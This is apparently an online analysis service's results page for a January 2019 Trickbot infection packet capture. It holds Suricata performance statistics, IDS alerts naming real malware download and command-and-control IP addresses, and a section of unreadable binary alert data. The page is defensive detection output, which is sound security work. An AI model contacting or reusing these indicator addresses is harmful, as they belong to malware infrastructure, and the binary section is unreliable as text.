Filename: 2019-01-30-Trickbot-infection-traffic.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 22.0649609566 seconds
Hash: 27c27f6013451b522f979b5a048809f1
Uploaded: 1548925217

Logfiles


packet_stats.log - (12917 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          7077          1253805      761055825     568647333       4024.3b   99.84
 IPv4      17            14         10814628      579873806     450896493          6.3b    0.16
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          7077            67358       13210254        147877          1.0b   93.20
TMM_FLOWWORKER              IPv4      17            14           401515        5329811        861668         12.1m    1.07
TMM_RECEIVEPCAPFILE         IPv4       6          7067             2540       18605704          6225         44.0m    3.92
TMM_RECEIVEPCAPFILE         IPv4      17            14             2549          10479          3216         45.0k    0.00
TMM_DECODEPCAPFILE          IPv4       6          7067             2656          38827          2860         20.2m    1.80
TMM_DECODEPCAPFILE          IPv4      17            14             2698          25181          4581         64.1k    0.01

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          7067             2809        7039445          5173         36.6m  3.89  
flow                    IPv4      17            14             2925          24381          5745         80.4k  0.01  
stream                  IPv4       6          7077             2772        1729316          6429         45.5m  4.84  
app-layer               IPv4      17            14             8748          36291         16109        225.5k  0.02  
detect                  IPv4       6          7077            44970       13177708        117296        830.1m  88.37 
detect                  IPv4      17            14           341633         704315        450870          6.3m  0.67  
tcp-prune               IPv4       6          7077             2549          36324          2910         20.6m  2.19  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6             9             3846          32602         10143         91.3k  42.13 
tls                     IPv4       6            16             2642           4463          2925         46.8k  21.60 
dns                     IPv4      17            14             3207           9857          5612         78.6k  36.26 
Proto detect            IPv4      17            14             3455          16920          6760         94.6k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            17            18763         107174         50703        862.0k  8.29  
LOGGER_UNIFIED2             IPv4       6            17            28743         193378         64713          1.1m  10.58 
LOGGER_JSON_ALERT           IPv4       6            17            42991         181988         84359          1.4m  13.79 
LOGGER_JSON_DNS             IPv4      17            14            29463        4531269        372577          5.2m  50.15 
LOGGER_JSON_HTTP            IPv4       6             7            40540         136333         83322        583.3k  5.61  
LOGGER_JSON_TLS             IPv4       6             8            36799         114899         68920        551.4k  5.30  
LOGGER_JSON_FILE            IPv4       6             7            66612         127886         93435        654.0k  6.29  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           744             2580         173471         23672        17.6m  13.89 
payload                           IPv4      17            14            12199          79949         35374       495.2k  0.39  
stream                            IPv4       6           744             2545       10575849         51132        38.0m  30.00 
http_uri                          IPv4       6             7             7566          45093         20724       145.1k  0.11  
http_request_line                 IPv4       6             7             5918           8569          7433        52.0k  0.04  
http_client_body                  IPv4       6            14             2632         229225         27491       384.9k  0.30  
http_header (request)             IPv4       6             7            23790         106533         62621       438.3k  0.35  
http_header (request trailer)     IPv4       6             7             2602           2831          2722        19.1k  0.02  
http_header_names (request)       IPv4       6             7            12425          25366         19172       134.2k  0.11  
http_accept (request)             IPv4       6             7             3654          11978          5005        35.0k  0.03  
http_referer (request)            IPv4       6             7             2912           4655          3590        25.1k  0.02  
http_content_len (request)        IPv4       6             7             3306           6321          4880        34.2k  0.03  
http_content_type (request)       IPv4       6             7             3814          12907          7429        52.0k  0.04  
http_protocol (request)           IPv4       6             7             3863           6596          5328        37.3k  0.03  
http_start (request)              IPv4       6             7            10919          20632         13846        96.9k  0.08  
http_raw_header (request)         IPv4       6            14             3764          14977          9039       126.6k  0.10  
http_method                       IPv4       6             7             5137           7370          6296        44.1k  0.03  
http_cookie (request)             IPv4       6             7             3292           4520          3715        26.0k  0.02  
http_raw_uri                      IPv4       6             7             5220           6815          6098        42.7k  0.03  
http_user_agent                   IPv4       6             7             2982          62768         25734       180.1k  0.14  
http_host                         IPv4       6             7             4398          11491          5798        40.6k  0.03  
dns_query                         IPv4      17             7             4670          42208         13378        93.6k  0.07  
tls_sni                           IPv4       6             9             2815           6944          3794        34.1k  0.03  
http_response_line                IPv4       6             7             8432          90314         21123       147.9k  0.12  
http_header (response)            IPv4       6             7            19166          50268         33308       233.2k  0.18  
http_header (response trailer)    IPv4       6             7             2623           3748          2959        20.7k  0.02  
http_content_type (response)      IPv4       6             7             4678           8139          5972        41.8k  0.03  
http_raw_header (response)        IPv4       6           637             3850          78694          4589         2.9m  2.31  
http_cookie (response)            IPv4       6             7             3057           3858          3364        23.6k  0.02  
http_stat_code                    IPv4       6             7             3598           4496          4060        28.4k  0.02  
tls_cert_issuer                   IPv4       6             8             4470           9193          7142        57.1k  0.05  
tls_cert_subject                  IPv4       6             8             7990          25718         12565       100.5k  0.08  
tls_cert_serial                   IPv4       6             8             3743           6578          5217        41.7k  0.03  
file_data (http response)         IPv4       6           630             2562        6277245        103149        65.0m  51.25 
Total                             IPv4                  2991                                         42392       126.8m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6            33             8388          95728         44048          1.5m  0.18  
PROF_DETECT_IPONLY          IPv4      17            14            36606         108143         45531        637.4k  0.08  
PROF_DETECT_RULES           IPv4       6          7077             2532       10746865         23191        164.1m  19.78 
PROF_DETECT_RULES           IPv4      17            14           158358         413408        268650          3.8m  0.45  
PROF_DETECT_STATEFUL_START    IPv4       6           401             5124        9759641        109828         44.0m  5.31  
PROF_DETECT_STATEFUL_CONT    IPv4       6          7077             2536        7006614          9547         67.6m  8.14  
PROF_DETECT_STATEFUL_CONT    IPv4      17            14             5476          87607         11765        164.7k  0.02  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          7012             2552          51271          2784         19.5m  2.35  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            14             2650          19815          4055         56.8k  0.01  
PROF_DETECT_PREFILTER       IPv4       6          7077             7901       10664619         35176        248.9m  30.01 
PROF_DETECT_PREFILTER       IPv4      17            14            41559         125838         72723          1.0m  0.12  
PROF_DETECT_PF_PAYLOAD      IPv4       6           744            14383       10620550         82988         61.7m  7.44  
PROF_DETECT_PF_PAYLOAD      IPv4      17            14            17270          85054         40579        568.1k  0.07  
PROF_DETECT_PF_TX           IPv4       6          7012             2557        6290906         14469        101.5m  12.23 
PROF_DETECT_PF_TX           IPv4      17             7             9991          47919         18949        132.6k  0.02  
PROF_DETECT_PF_SORT1        IPv4       6           480             2531          46230          3683          1.8m  0.21  
PROF_DETECT_PF_SORT1        IPv4      17            14             3663           5485          4486         62.8k  0.01  
PROF_DETECT_PF_SORT2        IPv4       6          7077             2521          53560          2772         19.6m  2.37  
PROF_DETECT_PF_SORT2        IPv4      17            14             2831          23145          4738         66.3k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       6          7077             2534        5832885          3795         26.9m  3.24  
PROF_DETECT_NONMPMLIST      IPv4      17            14             2591           3866          3029         42.4k  0.01  
PROF_DETECT_ALERT           IPv4       6          7077             2525          45591          2771         19.6m  2.36  
PROF_DETECT_ALERT           IPv4      17            14             2538          11819          3442         48.2k  0.01  
PROF_DETECT_CLEANUP         IPv4       6          7077             2563        4369827          3479         24.6m  2.97  
PROF_DETECT_CLEANUP         IPv4      17            14             2858           5154          3365         47.1k  0.01  
PROF_DETECT_GETSGH          IPv4       6          7077             2525          89614          3042         21.5m  2.60  
PROF_DETECT_GETSGH          IPv4      17            14             5373           6941          5823         81.5k  0.01  


suricata-4.0.0-etpro-all-perf.txt-2019-01-31-T-09-00-39-01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap.txt - (71126 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 1/31/2019 -- 09:00:39. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2020865      1        3        12332152     9.11   31       0        8633255     397811.35   0.00        397811.35  
  2        2018457      1        1        6648570      4.91   3        0        6639972     2216190.00  0.00        2216190.00 
  3        2008297      1        5        6249532      4.62   53       0        6088841     117915.70   0.00        117915.70  
  4        2014519      1        7        10786109     7.97   63       0        6021903     171208.08   0.00        171208.08  
  5        2804906      1        3        652187       0.48   4        0        530136      163046.75   0.00        163046.75  
  6        2803657      1        5        882864       0.65   9        0        493580      98096.00    0.00        98096.00   
  7        2802987      1        5        2254851      1.67   40       0        491679      56371.28    0.00        56371.28   
  8        2803027      1        6        1349285      1.00   13       0        489307      103791.15   0.00        103791.15  
  9        2804927      1        2        1034151      0.76   9        0        485411      114905.67   0.00        114905.67  
  10       2804907      1        3        1013645      0.75   6        0        482682      168940.83   0.00        168940.83  
  11       2802991      1        5        737214       0.54   7        0        480204      105316.29   0.00        105316.29  
  12       2820157      1        2        3660114      2.70   25       0        281837      146404.56   0.00        146404.56  
  13       2819930      1        2        4008294      2.96   27       0        268147      148455.33   0.00        148455.33  
  14       2819664      1        2        4027158      2.98   27       0        266790      149154.00   0.00        149154.00  
  15       2820158      1        2        3655128      2.70   25       0        258929      146205.12   0.00        146205.12  
  16       2827896      1        3        928224       0.69   6        0        257393      154704.00   0.00        154704.00  
  17       2016854      1        3        573210       0.42   3        0        237256      191070.00   0.00        191070.00  
  18       2016855      1        2        647281       0.48   3        0        236651      215760.33   0.00        215760.33  
  19       2018342      1        2        1204030      0.89   10       0        204458      120403.00   0.00        120403.00  
  20       2023476      1        5        739797       0.55   7        0        186692      105685.29   0.00        105685.29  
  21       2815154      1        2        509860       0.38   4        0        185800      127465.00   0.00        127465.00  
  22       2021749      1        6        260128       0.19   4        0        176615      65032.00    0.00        65032.00   
  23       2022797      1        2        1214304      0.90   11       0        167517      110391.27   0.00        110391.27  
  24       2830764      1        2        4321368      3.19   470      0        165283      9194.40     0.00        9194.40    
  25       2008575      1        5        4523966      3.34   558      0        141422      8107.47     0.00        8107.47    
  26       2809855      1        2        484591       0.36   5        0        129904      96918.20    0.00        96918.20   
  27       2809923      1        2        537845       0.40   5        0        124495      107569.00   0.00        107569.00  
  28       2019715      1        2        747207       0.55   11       0        123433      67927.91    0.00        67927.91   
  29       2814978      1        2        194083       0.14   4        0        116545      48520.75    0.00        48520.75   
  30       2017552      1        6        3583886      2.65   248      0        114278      14451.15    0.00        14451.15   
  31       2814979      1        2        194101       0.14   4        0        113853      48525.25    0.00        48525.25   
  32       2021375      1        2        460133       0.34   5        0        113662      92026.60    0.00        92026.60   
  33       2809981      1        3        465738       0.34   5        0        110872      93147.60    0.00        93147.60   
  34       2808503      1        2        469870       0.35   5        0        110353      93974.00    0.00        93974.00   
  35       2018358      1        7        328549       0.24   6        3        100948      54758.17    19656.33    89860.00   
  36       2021013      1        6        172662       0.13   2        2        99698       86331.00    86331.00    0.00       
  37       2019832      1        4        402689       0.30   5        0        96614       80537.80    0.00        80537.80   
  38       2811281      1        8        149502       0.11   3        0        82186       49834.00    0.00        49834.00   
  39       2018005      1        6        511026       0.38   9        0        79183       56780.67    0.00        56780.67   
  40       2820117      1        2        487526       0.36   11       0        77898       44320.55    0.00        44320.55   
  41       2822213      1        2        173661       0.13   9        0        77572       19295.67    0.00        19295.67   
  42       2809267      1        8        77442        0.06   1        0        77442       77442.00    0.00        77442.00   
  43       2022262      1        3        130983       0.10   3        0        76297       43661.00    0.00        43661.00   
  44       2018959      1        3        181207       0.13   3        3        74304       60402.33    60402.33    0.00       
  45       2804911      1        3        614364       0.45   12       0        72780       51197.00    0.00        51197.00   
  46       2022198      1        2        215982       0.16   4        0        71600       53995.50    0.00        53995.50   
  47       2020388      1        8        155804       0.12   3        0        71342       51934.67    0.00        51934.67   
  48       2810654      1        4        227820       0.17   4        4        70239       56955.00    56955.00    0.00       
  49       2016537      1        2        3854264      2.85   243      2        68855       15861.17    66135.50    15443.95   
  50       2830124      1        1        68456        0.05   1        0        68456       68456.00    0.00        68456.00   
  51       2024829      1        2        836831       0.62   38       0        67465       22021.87    0.00        22021.87   
  52       2821615      1        2        146324       0.11   3        0        67245       48774.67    0.00        48774.67   
  53       2816909      1        2        179509       0.13   3        0        67210       59836.33    0.00        59836.33   
  54       2013352      1        4        160808       0.12   3        0        64871       53602.67    0.00        53602.67   
  55       2018241      1        2        167527       0.12   3        0        64722       55842.33    0.00        55842.33   
  56       2821561      1        2        101241       0.07   2        0        64661       50620.50    0.00        50620.50   
  57       2025119      1        3        64154        0.05   1        0        64154       64154.00    0.00        64154.00   
  58       2025441      1        2        64100        0.05   1        0        64100       64100.00    0.00        64100.00   
  59       2828876      1        1        237754       0.18   61       0        63635       3897.61     0.00        3897.61    
  60       2022535      1        11       349847       0.26   7        0        62501       49978.14    0.00        49978.14   
  61       2816940      1        2        182848       0.14   3        0        62407       60949.33    0.00        60949.33   
  62       2021946      1        2        276895       0.20   5        0        61670       55379.00    0.00        55379.00   
  63       2823966      1        1        106245       0.08   16       0        59117       6640.31     0.00        6640.31    
  64       2022627      1        12       342456       0.25   7        0        59018       48922.29    0.00        48922.29   
  65       2830033      1        1        58451        0.04   1        0        58451       58451.00    0.00        58451.00   
  66       2815132      1        3        58084        0.04   1        0        58084       58084.00    0.00        58084.00   
  67       2816910      1        2        168466       0.12   3        0        57973       56155.33    0.00        56155.33   
  68       2009897      1        14       148550       0.11   3        0        57176       49516.67    0.00        49516.67   
  69       2022339      1        2        150818       0.11   3        0        55835       50272.67    0.00        50272.67   
  70       2816619      1        2        159787       0.12   4        0        55764       39946.75    0.00        39946.75   
  71       2017613      1        9        144728       0.11   3        0        55641       48242.67    0.00        48242.67   
  72       2815324      1        2        113176       0.08   3        0        55491       37725.33    0.00        37725.33   
  73       2008438      1        20       143643       0.11   3        0        55411       47881.00    0.00        47881.00   
  74       2816356      1        2        135152       0.10   3        0        55380       45050.67    0.00        45050.67   
  75       2023711      1        2        121403       0.09   3        0        55084       40467.67    0.00        40467.67   
  76       2008276      1        15       54939        0.04   1        1        54939       54939.00    54939.00    0.00       
  77       2816394      1        2        53938        0.04   1        0        53938       53938.00    0.00        53938.00   
  78       2014701      1        12       192371       0.14   14       0        53831       13740.79    0.00        13740.79   
  79       2022220      1        2        135240       0.10   3        0        53603       45080.00    0.00        45080.00   
  80       2815254      1        7        153860       0.11   3        0        53352       51286.67    0.00        51286.67   
  81       2025178      1        2        53057        0.04   1        0        53057       53057.00    0.00        53057.00   
  82       2816928      1        3        143648       0.11   3        0        52450       47882.67    0.00        47882.67   
  83       2816327      1        4        135902       0.10   3        0        52280       45300.67    0.00        45300.67   
  84       2828122      1        2        124471       0.09   3        0        52218       41490.33    0.00        41490.33   
  85       2816927      1        3        130110       0.10   3        0        51818       43370.00    0.00        43370.00   
  86       2022053      1        2        80306        0.06   3        0        51798       26768.67    0.00        26768.67   
  87       2801929      1        7        597112       0.44   14       0        51521       42650.86    0.00        42650.86   
  88       2815214      1        2        51346        0.04   1        0        51346       51346.00    0.00        51346.00   
  89       2801930      1        7        540433       0.40   14       0        51229       38602.36    0.00        38602.36   
  90       2014819      1        3        148191       0.11   3        0        51193       49397.00    0.00        49397.00   
  91       2022502      1        4        133283       0.10   3        0        50901       44427.67    0.00        44427.67   
  92       2019141      1        3        121935       0.09   3        0        50558       40645.00    0.00        40645.00   
  93       2024650      1        1        930655       0.69   63       0        50271       14772.30    0.00        14772.30   
  94       2022080      1        1        145097       0.11   4        4        49957       36274.25    36274.25    0.00       
  95       2816925      1        3        114794       0.08   3        0        48492       38264.67    0.00        38264.67   
  96       2826256      1        2        198718       0.15   7        0        48027       28388.29    0.00        28388.29   
  97       2820855      1        3        176301       0.13   10       0        47940       17630.10    0.00        17630.10   
  98       2812976      1        3        154806       0.11   4        0        47733       38701.50    0.00        38701.50   
  99       2014353      1        6        138788       0.10   3        0        47033       46262.67    0.00        46262.67   
  100      2021067      1        2        85086        0.06   2        2        46989       42543.00    42543.00    0.00       
  101      2022050      1        3        115193       0.09   3        0        46974       38397.67    0.00        38397.67   
  102      2024565      1        3        133004       0.10   4        0        46940       33251.00    0.00        33251.00   
  103      2812916      1        6        103693       0.08   3        0        46727       34564.33    0.00        34564.33   
  104      2020569      1        1        113773       0.08   3        0        46325       37924.33    0.00        37924.33   
  105      2022547      1        1        480212       0.35   141      0        45964       3405.76     0.00        3405.76    
  106      2823263      1        3        131812       0.10   4        0        45877       32953.00    0.00        32953.00   
  107      2009028      1        11       130404       0.10   3        0        45780       43468.00    0.00        43468.00   
  108      2018983      1        7        98736        0.07   3        0        45555       32912.00    0.00        32912.00   
  109      2805985      1        2        121645       0.09   3        0        45198       40548.33    0.00        40548.33   
  110      2014958      1        1        451848       0.33   33       0        45089       13692.36    0.00        13692.36   
  111      2018316      1        4        141567       0.10   4        0        44929       35391.75    0.00        35391.75   
  112      2018452      1        15       116594       0.09   3        0        44618       38864.67    0.00        38864.67   
  113      2816930      1        4        122433       0.09   3        0        44557       40811.00    0.00        40811.00   
  114      2830243      1        2        64052        0.05   5        1        44198       12810.40    10707.00    13336.25   
  115      2018496      1        9        103138       0.08   3        0        43388       34379.33    0.00        34379.33   
  116      2809256      1        3        89842        0.07   16       0        43200       5615.12     0.00        5615.12    
  117      2009909      1        10       126455       0.09   3        0        43145       42151.67    0.00        42151.67   
  118      2018958      1        18       127209       0.09   3        0        42600       42403.00    0.00        42403.00   
  119      2013441      1        9        124391       0.09   3        0        42407       41463.67    0.00        41463.67   
  120      2012969      1        2        41420        0.03   1        0        41420       41420.00    0.00        41420.00   
  121      2811282      1        7        41407        0.03   1        0        41407       41407.00    0.00        41407.00   
  122      2022197      1        3        71311        0.05   2        0        41343       35655.50    0.00        35655.50   
  123      2816328      1        5        95742        0.07   3        0        41143       31914.00    0.00        31914.00   
  124      2816525      1        10       118282       0.09   3        0        40912       39427.33    0.00        39427.33   
  125      2023315      1        2        1

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-alert-2019-01-31-T-09-00-39-01312019.0900-2019-01-30-Trickbot-infection-traffic.pcap.txt - (5189 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
01/30/2019-21:03:51.319533  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 37.59.247.21:80 -> 10.1.30.101:49194
01/30/2019-21:03:51.319533  [**] [1:2016538:3] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 37.59.247.21:80 -> 10.1.30.101:49194
01/30/2019-21:04:05.406223  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49197
01/30/2019-21:04:10.762144  [**] [1:2810654:4] ETPRO POLICY Possibly Suspicious example.com SSL Cert [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49200
01/30/2019-21:04:10.771347  [**] [1:2021013:6] ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49200
01/30/2019-21:04:10.771347  [**] [1:2810654:4] ETPRO POLICY Possibly Suspicious example.com SSL Cert [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49200
01/30/2019-21:04:59.542845  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49201
01/30/2019-21:05:01.999394  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49202
01/30/2019-21:05:22.548371  [**] [1:2018358:7] ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.30.101:49203 -> 24.247.181.125:8082
01/30/2019-21:06:07.110045  [**] [1:2018358:7] ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.30.101:49204 -> 24.247.181.125:8082
01/30/2019-21:06:10.021646  [**] [1:2018358:7] ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.30.101:49205 -> 24.247.181.125:8082
01/30/2019-21:06:30.723373  [**] [1:2810654:4] ETPRO POLICY Possibly Suspicious example.com SSL Cert [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49206
01/30/2019-21:06:30.730375  [**] [1:2021013:6] ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49206
01/30/2019-21:06:30.730375  [**] [1:2810654:4] ETPRO POLICY Possibly Suspicious example.com SSL Cert [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 92.38.135.151:447 -> 10.1.30.101:49206
01/30/2019-21:07:04.819752  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 107.173.104.203:80 -> 10.1.30.101:49207
01/30/2019-21:07:04.819752  [**] [1:2016538:3] ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 107.173.104.203:80 -> 10.1.30.101:49207
01/30/2019-21:07:04.819752  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 107.173.104.203:80 -> 10.1.30.101:49207
01/30/2019-21:07:46.268769  [**] [1:2830243:2] ETPRO TROJAN W32/Trickbot C2 (networkDll module) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.30.101:49259 -> 24.247.181.125:8082
01/30/2019-21:07:46.268769  [**] [1:2100494:12] GPL ATTACK_RESPONSE command completed [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 10.1.30.101:49259 -> 24.247.181.125:8082
01/30/2019-21:08:01.444668  [**] [1:2008276:15] ET USER_AGENTS Suspicious User-Agent (contains loader) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.30.101:49260 -> 107.173.104.203:80
01/30/2019-21:08:01.602850  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 107.173.104.203:80 -> 10.1.30.101:49260
01/30/2019-21:08:01.602850  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 107.173.104.203:80 -> 10.1.30.101:49260
01/30/2019-21:13:12.661871  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49536
01/30/2019-21:16:37.641673  [**] [1:2011540:6] ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 190.14.158.193:449 -> 10.1.30.101:49537


unified2.alert.1548925237 - (63091 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
4\R7à-Ώ!%;÷
ePÀ*N\R7\R7à-2E$q%;÷
ePÀ*P &‚ù9iyÀNçF…Ò†¶Œ®¬G`‡ ãWOQ!Μ'dŽ#ëA¾mcÒÈ©
zè!ٖߤ'÷P÷Ðæ
Ã=V‡	„è§ìUwð<t¦Ã;I(…ëí1K›”i€du'Q3HÞÌâ@8˜Ý½êÓ+*ô-(›<+r,™›ß$¹$è”ÔÖÙRCK¯4`üªWœïuü•:¨½ú0¼†qÎs[ÀZb îêAÇ­Ÿ(ûWYT«Õ'Y^Jr`°5úJˆ<‚‡¦õ	s4nj2z‹†V.rlRˆè	͉»E°ÌbŠ(šO\µÎ<LU]1*\î?¢Áégb—aøëy½ÇÁk„cöîîá÷áõççÔE¾rîÁ§îÏ77ŒYpëæ|W$¯ô¯¡»Ì~n7­Äö´GL%‘Ð}[ðvàkØdŒ,Ê÷¡\ŽUé°	àOL¤þâKU…-MâØhi÷ºB>›Í$½@÷è8ŠðŸ%õ?*kºÍePÆ 8[5^:4zÝeÕS>8â”æz>aáÄüþ™×ö„ˆÅD‡×#þñ¶9yBÎk^æU´íê
Èì.%h·¢뇟V·±™S¦BWV]
î«ÕåÍîOÄ 
·—,×£=K¿,tNÌËè´€
å!['~x×èh$È jà5
´	õªän߂²S¯Ý˜(­žã+Ռ;®BoÂ>RÄDÇ(ñm` q”‘ÓÏý€@ø{ -‚ž'ä<±ë²Y|fKš®þ%Ñh¼cZgÜ?¢gÂ{eB‚Vµ§§öy2%{ÙUÏkúLÅñâ˜Ö”`žݯéfiý-"NÊêÍÊÔ+5q>ˆ³=½Ñ=ÈibÓè®DÙGs]‡0ÖʛcsJKsæŸÓVG„ÜdãÆõo›_‚ð©T™HVn±¾Ç•VÙ§1mçãñ°-2Ô SŒè	‹1ç™Í¯ÊIèNˆð6ädY㌉
Cµ(+á+<ÊnúÀ®‹ó ›pm0Æg*t؎ø<Ëoî¾QuFkÑ·Ý\ûSnTÝÂè±úgà-h ¼HÓE¿0Ÿa«óL'é´Üꯅ6uèù¸¢r‰ÔûΔ™—cL÷ᵔ’Yòä8Ö¿ÖÅ_¥ÇnÃcÞ)S¢:#meåë„Iiºs*ðÒ¼9)Xß6	ÑísÆy‚ŒGʁ&»¥\l‘¹!4܉­Å83;²…øÔËKg}xPC¦֟1,®>€Ç
*Êe
=H†«(/
­Ï"	ôºeŸÏÑS¯tœVü¹ï“¥¤-8½z2ð-¢âè÷ZÐeùÈ~ˆÈal̈Ò
„ñ”î(˜Mjœ}:Ѫ
